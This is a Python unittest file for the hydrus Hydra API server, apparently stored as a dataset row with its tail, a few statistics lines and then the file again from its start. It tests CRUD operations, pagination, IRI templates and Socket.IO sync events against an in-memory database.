post_replace_response = self.client.post( '{}/{}'.format(endpoints[endpoint], id_), data=json.dumps(dummy_object)) assert post_replace_response.status_code == 200 def test_object_DELETE(self): """Test DELETE of a given object using ID.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) initial_put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert initial_put_response.status_code == 201 response = json.loads( initial_put_response.data.decode('utf-8')) regex = r'(.*)ID (.{36})* (.*)' matchObj = re.match(regex, response["description"]) assert matchObj is not None id_ = matchObj.group(2) if "DELETE" in class_methods: delete_response = self.client.delete( '{}/{}'.format(endpoints[endpoint], id_)) assert delete_response.status_code == 200 def test_object_PUT_at_id(self): """Create object in collection using PUT at specific ID.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) if "PUT" in class_methods: dummy_object = gen_dummy_object( collection.class_.title, self.doc) put_response = self.client.put('{}/{}'.format( endpoints[endpoint], uuid.uuid4()), data=json.dumps(dummy_object)) assert put_response.status_code == 201 def test_endpointClass_PUT(self): """Check non collection Class PUT.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "PUT" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert put_response.status_code == 201 def test_endpointClass_POST(self): """Check non collection Class POST.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "POST" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) post_response = self.client.post( endpoints[endpoint], data=json.dumps(dummy_object)) assert post_response.status_code == 200 def test_endpointClass_DELETE(self): """Check non collection Class DELETE.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "DELETE" in class_methods: delete_response = self.client.delete( endpoints[endpoint]) assert delete_response.status_code == 200 def test_endpointClass_GET(self): """Check non collection Class GET.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "GET" in class_methods: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "@context" in response_get_data assert "@id" in response_get_data assert "@type" in response_get_data def test_IriTemplate(self): """Test structure of IriTemplates attached to collections""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "search" in response_get_data assert "mapping" in response_get_data["search"] collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_props = [x.prop for x in class_.supportedProperty] for mapping in response_get_data["search"]["mapping"]: if mapping["property"] not in ["limit", "offset", "pageIndex"]: assert mapping["property"] in class_props def test_client_controlled_pagination(self): """Test pagination controlled by client with help of pageIndex, offset and limit parameters.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "search" in response_get_data assert "mapping" in response_get_data["search"] # Test with pageIndex and limit params = {"pageIndex": 1, "limit": 2} response_for_page_param = self.client.get(endpoints[endpoint], query_string=params) assert response_for_page_param.status_code == 200 response_for_page_param_data = json.loads( response_for_page_param.data.decode('utf-8')) assert "first" in response_for_page_param_data["view"] assert "last" in response_for_page_param_data["view"] if "next" in response_for_page_param_data["view"]: assert "pageIndex=2" in response_for_page_param_data["view"]["next"] next_response = self.client.get(response_for_page_param_data["view"]["next"]) assert next_response.status_code == 200 next_response_data = json.loads( next_response.data.decode('utf-8')) assert "previous" in next_response_data["view"] assert "pageIndex=1" in next_response_data["view"]["previous"] # Test with offset and limit params = {"offset": 1, "limit": 2} response_for_offset_param = self.client.get(endpoints[endpoint], query_string=params) assert response_for_offset_param.status_code == 200 response_for_offset_param_data = json.loads( response_for_offset_param.data.decode('utf-8')) assert "first" in response_for_offset_param_data["view"] assert "last" in response_for_offset_param_data["view"] if "next" in response_for_offset_param_data["view"]: assert "offset=3" in response_for_offset_param_data["view"]["next"] next_response = self.client.get( response_for_offset_param_data["view"]["next"]) assert next_response.status_code == 200 next_response_data = json.loads( next_response.data.decode('utf-8')) assert "previous" in next_response_data["view"] assert "offset=1" in next_response_data["view"]["previous"] def test_bad_objects(self): """Checks if bad objects are added or not.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: bad_response_put = self.client.put( endpoints[endpoint], data=json.dumps( dict( foo='bar'))) assert bad_response_put.status_code == 400 def test_bad_requests(self): """Checks if bad requests are handled or not.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) initial_put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert initial_put_response.status_code == 201 response = json.loads( initial_put_response.data.decode('utf-8')) regex = r'(.*)ID (.{36})* (.*)' matchObj = re.match(regex, response["description"]) assert matchObj is not None id_ = matchObj.group(2) if "POST" not in class_methods: dummy_object = gen_dummy_object( collection.class_.title, self.doc) post_replace_response = self.client.post( '{}/{}'.format(endpoints[endpoint], id_), data=json.dumps(dummy_object)) assert post_replace_response.status_code == 405 if "DELETE" not in class_methods: delete_response = self.client.delete( '{}/{}'.format(endpoints[endpoint], id_)) assert delete_response.status_code == 405 def test_Endpoints_Contexts(self): """Test all endpoints contexts are generated properly.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 context = json.loads( response_get.data.decode('utf-8'))["@context"] response_context = self.client.get(context) response_context_data = json.loads( response_context.data.decode('utf-8')) assert response_context.status_code == 200 assert "@context" in response_context_data class SocketTestCase(unittest.TestCase): """Test Class for socket events and operations.""" @classmethod def setUpClass(self): """Database setup before the tests.""" print("Creating a temporary database...") engine = create_engine('sqlite:///:memory:') Base.metadata.create_all(engine) session = scoped_session(sessionmaker(bind=engine)) self.session = session self.API_NAME = "demoapi" self.page_size = 1 self.HYDRUS_SERVER_URL = "http://hydrus.com/" self.app = app_factory(self.API_NAME) self.socketio = create_socket(self.app, self.session) print("going for create doc") self.doc = doc_maker.create_doc( doc_writer_sample.api_doc.generate(), self.HYDRUS_SERVER_URL, self.API_NAME) test_classes = doc_parse.get_classes(self.doc.generate()) test_properties = doc_parse.get_all_properties(test_classes) doc_parse.insert_classes(test_classes, self.session) doc_parse.insert_properties(test_properties, self.session) print("Classes and properties added successfully.") print("Setting up hydrus utilities... ") self.api_name_util = set_api_name(self.app, self.API_NAME) self.session_util = set_session(self.app, self.session) self.doc_util = set_doc(self.app, self.doc) self.page_size_util = set_page_size(self.app, self.page_size) self.client = self.app.test_client() self.socketio_client = self.socketio.test_client(self.app, namespace='/sync') print("Creating utilities context... ") self.api_name_util.__enter__() self.session_util.__enter__() self.doc_util.__enter__() self.client.__enter__() print("Setup done, running tests...") @classmethod def tearDownClass(self): """Tear down temporary database and exit utilities""" self.client.__exit__(None, None, None) self.doc_util.__exit__(None, None, None) self.session_util.__exit__(None, None, None) self.api_name_util.__exit__(None, None, None) self.session.close() def test_connect(self): """Test connect event.""" socket_client = self.socketio.test_client(self.app, namespace='/sync') data = socket_client.get_received('/sync') assert len(data) > 0 event = data[0] assert event['name'] == 'connect' last_job_id = crud.get_last_modification_job_id(self.session) assert event['args'][0]['last_job_id'] == last_job_id socket_client.disconnect(namespace='/sync') def test_reconnect(self): """Test reconnect event.""" socket_client = self.socketio.test_client(self.app, namespace='/sync') # Flush data of first connect event socket_client.get_received('/sync') # Client reconnects by emitting 'reconnect' event. socket_client.emit('reconnect', namespace='/sync') # Get update received on reconnecting to the server data = socket_client.get_received('/sync') assert len(data) > 0 # Extract the event information event = data[0] assert event['name'] == 'connect' last_job_id = crud.get_last_modification_job_id(self.session) # Check last job id with last_job_id received by client in the update. assert event['args'][0]['last_job_id'] == last_job_id socket_client.disconnect(namespace='/sync') def test_modification_table_diff(self): """Test 'modification-table-diff' events.""" # Flush old received data at socket client self.socketio_client.get_received('/sync') # Set last_job_id as the agent_job_id agent_job_id = crud.get_last_modification_job_id(self.session) # Add an extra modification record newer than the agent_job_id new_latest_job_id = crud.insert_modification_record(method="POST", resource_url="", session=self.session) self.socketio_client.emit('get_modification_table_diff', {'agent_job_id': agent_job_id}, namespace='/sync') data = self.socketio_client.get_received('/sync') assert len(data) > 0 event = data[0] assert event['name'] == 'modification_table_diff' # Check received event contains data of newly added modification record. assert event['args'][0][0]['method'] == "POST" assert event['args'][0][0]['resource_url'] == "" assert event['args'][0][0]['job_id'] == new_latest_job_id def test_socketio_POST_updates(self): """Test 'update' event emitted by socketio for POST operations.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "POST" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) # Flush old socketio updates self.socketio_client.get_received('/sync') post_response = self.client.post( endpoints[endpoint], data=json.dumps(dummy_object)) assert post_response.status_code == 200 # Get new socketio update update = self.socketio_client.get_received('/sync') assert len(update) != 0 assert update[0]['args'][0]['method'] == "POST" resource_name = update[0]['args'][0]['resource_url'].split('/')[-1] assert resource_name == endpoints[endpoint].split('/')[-1] def test_socketio_DELETE_updates(self): """Test 'update' event emitted by socketio for DELETE operations.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "DELETE" in class_methods: # Flush old socketio updates self.socketio_client.get_received('/sync') delete_response = self.client.delete( endpoints[endpoint]) assert delete_response.status_code == 200 # Get new update event update = self.socketio_client.get_received('/sync') assert len(update) != 0 assert update[0]['args'][0]['method'] == 'DELETE' resource_name = update[0]['args'][0]['resource_url'].split('/')[-1] assert resource_name == endpoints[endpoint].split('/')[-1] if __name__ == '__main__': message = """ Running tests for the app. Checking if all responses are in proper order. """ unittest.main()
51.929705
100
0.550696
"""Test for checking if the response format is proper. Run test_crud before running this.""" import unittest import random import string import json import re import uuid from hydrus.app_factory import app_factory from hydrus.socketio_factory import create_socket from hydrus.utils import set_session, set_doc, set_api_name, set_page_size from hydrus.data import doc_parse, crud from hydra_python_core import doc_maker from hydra_python_core.doc_writer import HydraLink from hydrus.samples import doc_writer_sample from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker, scoped_session from hydrus.data.db_models import Base def gen_dummy_object(class_title, doc): """Create a dummy object based on the definitions in the API Doc. :param class_title: Title of the class whose object is being created. :param doc: ApiDoc. :return: A dummy object of class `class_title`. """ object_ = { "@type": class_title } for class_path in doc.parsed_classes: if class_title == doc.parsed_classes[class_path]["class"].title: for prop in doc.parsed_classes[class_path]["class"].supportedProperty: if isinstance(prop.prop, HydraLink) or prop.write is False: continue if "vocab:" in prop.prop: prop_class = prop.prop.replace("vocab:", "") object_[prop.title] = gen_dummy_object(prop_class, doc) else: object_[prop.title] = ''.join(random.choice( string.ascii_uppercase + string.digits) for _ in range(6)) return object_ class ViewsTestCase(unittest.TestCase): """Test Class for the app.""" @classmethod def setUpClass(self): """Database setup before the tests.""" print("Creating a temporary database...") engine = create_engine('sqlite:///:memory:') Base.metadata.create_all(engine) session = scoped_session(sessionmaker(bind=engine)) self.session = session self.API_NAME = "demoapi" self.page_size = 1 self.HYDRUS_SERVER_URL = "http://hydrus.com/" self.app = app_factory(self.API_NAME) self.socketio = create_socket(self.app, self.session) print("going for create doc") self.doc = doc_maker.create_doc( doc_writer_sample.api_doc.generate(), self.HYDRUS_SERVER_URL, self.API_NAME) test_classes = doc_parse.get_classes(self.doc.generate()) test_properties = doc_parse.get_all_properties(test_classes) doc_parse.insert_classes(test_classes, self.session) doc_parse.insert_properties(test_properties, self.session) print("Classes and properties added successfully.") print("Setting up hydrus utilities... ") self.api_name_util = set_api_name(self.app, self.API_NAME) self.session_util = set_session(self.app, self.session) self.doc_util = set_doc(self.app, self.doc) self.page_size_util = set_page_size(self.app, self.page_size) self.client = self.app.test_client() print("Creating utilities context... ") self.api_name_util.__enter__() self.session_util.__enter__() self.doc_util.__enter__() self.client.__enter__() print("Setup done, running tests...") @classmethod def tearDownClass(self): """Tear down temporary database and exit utilities""" self.client.__exit__(None, None, None) self.doc_util.__exit__(None, None, None) self.session_util.__exit__(None, None, None) self.api_name_util.__exit__(None, None, None) self.session.close() def setUp(self): for class_ in self.doc.parsed_classes: link_props = {} class_title = self.doc.parsed_classes[class_]["class"].title dummy_obj = gen_dummy_object(class_title, self.doc) for supportedProp in self.doc.parsed_classes[class_]['class'].supportedProperty: if isinstance(supportedProp.prop, HydraLink): class_name = supportedProp.prop.range.replace("vocab:", "") for collection_path in self.doc.collections: coll_class = self.doc.collections[ collection_path]['collection'].class_.title if class_name == coll_class: id_ = str(uuid.uuid4()) crud.insert( gen_dummy_object(class_name, self.doc), id_=id_, session=self.session) link_props[supportedProp.title] = id_ dummy_obj[supportedProp.title] = "{}/{}/{}".format( self.API_NAME, collection_path, id_) crud.insert( dummy_obj, id_=str( uuid.uuid4()), link_props=link_props, session=self.session) # If it's a collection class then add an extra object so # we can test pagination thoroughly. if class_ in self.doc.collections: crud.insert( dummy_obj, id_=str( uuid.uuid4()), session=self.session) def test_Index(self): """Test for the index.""" response_get = self.client.get("/{}".format(self.API_NAME)) endpoints = json.loads(response_get.data.decode('utf-8')) response_post = self.client.post( "/{}".format(self.API_NAME), data=dict(foo="bar")) response_put = self.client.put( "/{}".format(self.API_NAME), data=dict(foo="bar")) response_delete = self.client.delete("/{}".format(self.API_NAME)) assert "@context" in endpoints assert endpoints["@id"] == "/{}".format(self.API_NAME) assert endpoints["@type"] == "EntryPoint" assert response_get.status_code == 200 assert response_post.status_code == 405 assert response_put.status_code == 405 assert response_delete.status_code == 405 def test_EntryPoint_context(self): """Test for the EntryPoint context.""" response_get = self.client.get( "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME)) response_get_data = json.loads(response_get.data.decode('utf-8')) response_post = self.client.post( "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME), data={}) response_delete = self.client.delete( "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME)) assert response_get.status_code == 200 assert "@context" in response_get_data assert response_post.status_code == 405 assert response_delete.status_code == 405 def test_Vocab(self): """Test the vocab.""" response_get = self.client.get("/{}/vocab#".format(self.API_NAME)) response_get_data = json.loads(response_get.data.decode('utf-8')) assert "@context" in response_get_data assert response_get_data["@type"] == "ApiDocumentation" assert response_get_data["@id"] == "{}{}/vocab".format( self.HYDRUS_SERVER_URL, self.API_NAME) assert response_get.status_code == 200 response_delete = self.client.delete( "/{}/vocab#".format(self.API_NAME)) assert response_delete.status_code == 405 response_put = self.client.put( "/{}/vocab#".format(self.API_NAME), data=json.dumps(dict(foo='bar'))) assert response_put.status_code == 405 response_post = self.client.post( "/{}/vocab#".format(self.API_NAME), data=json.dumps(dict(foo='bar'))) assert response_post.status_code == 405 def test_Collections_GET(self): """Test GET on collection endpoints.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) # pdb.set_trace() assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "@context" in response_get_data assert "@id" in response_get_data assert "@type" in response_get_data assert "members" in response_get_data # Check the item URI has the valid format, so it can be dereferenced if len(response_get_data["members"]) > 0: for item in response_get_data["members"]: class_type = item["@type"] if class_type in self.doc.parsed_classes: class_ = self.doc.parsed_classes[class_type]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "GET" in class_methods: item_response = self.client.get( response_get_data["members"][0]["@id"]) assert item_response.status_code == 200 def test_pagination(self): """Test basic pagination""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "view" in response_get_data assert "first" in response_get_data["view"] assert "last" in response_get_data["view"] if "next" in response_get_data["view"]: response_next = self.client.get(response_get_data["view"]["next"]) assert response_next.status_code == 200 response_next_data = json.loads( response_next.data.decode('utf-8')) assert "previous" in response_next_data["view"] break def test_Collections_PUT(self): """Test insert data to the collection.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] dummy_object = gen_dummy_object( collection.class_.title, self.doc) good_response_put = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert good_response_put.status_code == 201 def test_object_POST(self): """Test replace of a given object using ID.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) initial_put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert initial_put_response.status_code == 201 response = json.loads( initial_put_response.data.decode('utf-8')) regex = r'(.*)ID (.{36})* (.*)' matchObj = re.match(regex, response["description"]) assert matchObj is not None id_ = matchObj.group(2) if "POST" in class_methods: dummy_object = gen_dummy_object( collection.class_.title, self.doc) post_replace_response = self.client.post( '{}/{}'.format(endpoints[endpoint], id_), data=json.dumps(dummy_object)) assert post_replace_response.status_code == 200 def test_object_DELETE(self): """Test DELETE of a given object using ID.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) initial_put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert initial_put_response.status_code == 201 response = json.loads( initial_put_response.data.decode('utf-8')) regex = r'(.*)ID (.{36})* (.*)' matchObj = re.match(regex, response["description"]) assert matchObj is not None id_ = matchObj.group(2) if "DELETE" in class_methods: delete_response = self.client.delete( '{}/{}'.format(endpoints[endpoint], id_)) assert delete_response.status_code == 200 def test_object_PUT_at_id(self): """Create object in collection using PUT at specific ID.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) if "PUT" in class_methods: dummy_object = gen_dummy_object( collection.class_.title, self.doc) put_response = self.client.put('{}/{}'.format( endpoints[endpoint], uuid.uuid4()), data=json.dumps(dummy_object)) assert put_response.status_code == 201 def test_object_PUT_at_ids(self): index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] data_ = {"data": list()} objects = list() ids = "" for index in range(3): objects.append(gen_dummy_object( collection.class_.title, self.doc)) ids = "{},".format(uuid.uuid4()) data_["data"] = objects if "PUT" in class_methods: put_response = self.client.put( '{}/add/{}'.format(endpoints[endpoint], ids), data=json.dumps(data_)) assert put_response.status_code == 201 def test_endpointClass_PUT(self): """Check non collection Class PUT.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "PUT" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert put_response.status_code == 201 def test_endpointClass_POST(self): """Check non collection Class POST.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "POST" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) post_response = self.client.post( endpoints[endpoint], data=json.dumps(dummy_object)) assert post_response.status_code == 200 def test_endpointClass_DELETE(self): """Check non collection Class DELETE.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "DELETE" in class_methods: delete_response = self.client.delete( endpoints[endpoint]) assert delete_response.status_code == 200 def test_endpointClass_GET(self): """Check non collection Class GET.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "GET" in class_methods: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "@context" in response_get_data assert "@id" in response_get_data assert "@type" in response_get_data def test_IriTemplate(self): """Test structure of IriTemplates attached to collections""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "search" in response_get_data assert "mapping" in response_get_data["search"] collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_props = [x.prop for x in class_.supportedProperty] for mapping in response_get_data["search"]["mapping"]: if mapping["property"] not in ["limit", "offset", "pageIndex"]: assert mapping["property"] in class_props def test_client_controlled_pagination(self): """Test pagination controlled by client with help of pageIndex, offset and limit parameters.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "search" in response_get_data assert "mapping" in response_get_data["search"] # Test with pageIndex and limit params = {"pageIndex": 1, "limit": 2} response_for_page_param = self.client.get(endpoints[endpoint], query_string=params) assert response_for_page_param.status_code == 200 response_for_page_param_data = json.loads( response_for_page_param.data.decode('utf-8')) assert "first" in response_for_page_param_data["view"] assert "last" in response_for_page_param_data["view"] if "next" in response_for_page_param_data["view"]: assert "pageIndex=2" in response_for_page_param_data["view"]["next"] next_response = self.client.get(response_for_page_param_data["view"]["next"]) assert next_response.status_code == 200 next_response_data = json.loads( next_response.data.decode('utf-8')) assert "previous" in next_response_data["view"] assert "pageIndex=1" in next_response_data["view"]["previous"] # Test with offset and limit params = {"offset": 1, "limit": 2} response_for_offset_param = self.client.get(endpoints[endpoint], query_string=params) assert response_for_offset_param.status_code == 200 response_for_offset_param_data = json.loads( response_for_offset_param.data.decode('utf-8')) assert "first" in response_for_offset_param_data["view"] assert "last" in response_for_offset_param_data["view"] if "next" in response_for_offset_param_data["view"]: assert "offset=3" in response_for_offset_param_data["view"]["next"] next_response = self.client.get( response_for_offset_param_data["view"]["next"]) assert next_response.status_code == 200 next_response_data = json.loads( next_response.data.decode('utf-8')) assert "previous" in next_response_data["view"] assert "offset=1" in next_response_data["view"]["previous"] def test_GET_for_nested_class(self): index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "GET" in class_methods: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "@context" in response_get_data assert "@id" in response_get_data assert "@type" in response_get_data class_props = [x for x in class_.supportedProperty] for prop_name in class_props: if isinstance(prop_name.prop, HydraLink) and prop_name.read is True: nested_obj_resp = self.client.get( response_get_data[prop_name.title]) assert nested_obj_resp.status_code == 200 nested_obj = json.loads( nested_obj_resp.data.decode('utf-8')) assert "@type" in nested_obj elif "vocab:" in prop_name.prop: assert "@type" in response_get_data[prop_name.title] def 